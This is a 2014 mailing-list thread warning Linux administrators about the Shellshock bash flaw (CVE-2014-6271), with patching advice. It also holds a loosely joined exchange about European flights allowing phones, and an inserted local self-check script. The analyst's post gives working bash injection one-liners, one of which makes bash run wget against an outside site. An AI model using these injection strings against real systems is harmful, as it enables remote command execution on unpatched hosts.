Re: [kictanet] [Skunkworks] Bash Code Injection Vulnerability (CVE-2014-6271)
This vulnerability is worse than Heartbleed; even after patching Bash, you can still inject into it.

    rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo
    rm -f echo && env -i X='() { (a)=>\' bash -c 'echo ls -la'; cat echo
    rm -f echo && env -i X='() { (a)=>\' bash -c 'echo wget http://my.co.ke/';

Be prepared to patch, and still watch your systems, and patch later on, when a full one is released.

On 9/26/14, Amarjit Labhuram via skunkworks <skunkworks@lists.my.co.ke> wrote:
To the linux admins,
here is some more info on Shellshock. http://www.bbc.com/news/technology-29361794/
Have a great day!
Warm regards, Amarjit Singh Labhuram.
On Thu, Sep 25, 2014 at 5:08 PM, Laban Mwangi via skunkworks < skunkworks@lists.my.co.ke> wrote:
Anything that uses bash (Linux/FreeBSD/OSX/Cygwin)... Potentially, this includes your home router (dlink, linksys)!
On Thu, Sep 25, 2014 at 8:38 AM, Bwana Lawi via skunkworks < skunkworks@lists.my.co.ke> wrote:
If you are using Red Hat products, please have this patched.
Read more here.
_______________________________________________ skunkworks mailing list skunkworks@lists.my.co.ke ------------ List info, subscribe/unsubscribe http://lists.my.co.ke/cgi-bin/mailman/listinfo/skunkworks ------------
Skunkworks Rules http://my.co.ke/phpbb/viewtopic.php?f=24&t=94 ------------ Other services @ http://my.co.ke
--
Gichuki John Ndirangu, C.E.H, C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM} http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
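
A local self-check built around the commands in the message above (an added example, not part of the original post): it runs the same `env -i X=...` test with the harmless `echo date` command inside a scratch directory and reports whether a file named `echo` appeared. The function name, output strings and return codes are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original thread.
# check_bash_parser_bug [BASH_PATH]
#   prints "vulnerable", "not vulnerable", "not found" or "error"
#   returns 1 if vulnerable, 0 if not, 2 if the binary is missing, 3 on error
check_bash_parser_bug() {
    bash_bin=${1:-bash}
    # Resolve to a full path first: env -i clears PATH for the child process.
    bash_path=$(command -v "$bash_bin" 2>/dev/null) || { echo "not found"; return 2; }

    # Run in an empty scratch directory so the test cannot touch real files.
    scratch=$(mktemp -d) || { echo "error"; return 3; }
    rc=0
    (
        cd "$scratch" || exit 3
        # Same environment string as in the message, with the harmless
        # 'echo date' command. An affected bash leaves '>\' in its parser
        # buffer, so 'echo date' is read as '>echo date': 'date' runs with
        # its output redirected into a new file named ./echo.
        env -i X='() { (a)=>\' "$bash_path" -c 'echo date' >/dev/null 2>&1
        # Exit 0 if the file was created (affected), 1 if not.
        [ -e echo ]
    ) || rc=$?
    rm -rf "$scratch"

    case $rc in
        0) echo "vulnerable";     return 1 ;;
        1) echo "not vulnerable"; return 0 ;;
        *) echo "error";          return 3 ;;
    esac
}
```

Source the file and call `check_bash_parser_bug /bin/bash` for each bash binary installed on the host, including copies under `/usr/local` or inside chroots and container images.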
Passengers on board flights in Europe will be allowed to use their smartphones and tablets completely, without the need to turn on Airplane Mode. The EASA (European Aviation Safety Agency) has lifted the restriction, meaning phones can be used even during take off and landing, which was previously limited to Airplane Mode only. Read more: http://www.digitalspy.co.uk/tech/news/a599585/flights-in-europe-now-allowed-...
If phones were as dangerous on planes as we are made to believe, Al Qaeda wouldn't bother researching ways to sneak explosives and weapons on to planes.

On 28 Sep 2014 12:03, "waudo siganga via kictanet" <kictanet@lists.kictanet.or.ke> wrote:
Passengers on board flights in Europe will be allowed to use their smartphones and tablets completely, without the need to turn on Airplane Mode. The EASA (European Aviation Safety Agency) has lifted the restriction, meaning phones can be used even during take off and landing, which was previously limited to Airplane Mode only.
Read more:
http://www.digitalspy.co.uk/tech/news/a599585/flights-in-europe-now-allowed-...
_______________________________________________ kictanet mailing list kictanet@lists.kictanet.or.ke https://lists.kictanet.or.ke/mailman/listinfo/kictanet
The Kenya ICT Action Network (KICTANet) is a multi-stakeholder platform for people and institutions interested and involved in ICT policy and regulation. The network aims to act as a catalyst for reform in the ICT sector in support of the national aim of ICT enabled growth and development.
KICTANetiquette : Adhere to the same standards of acceptable behaviors online that you follow in real life: respect people's times and bandwidth, share knowledge, don't flame or abuse or personalize, respect privacy, do not spam, do not market your wares or qualifications.
participants (3)
- Dennis Kioko
- Gichuki John Chuksjonia
- waudo siganga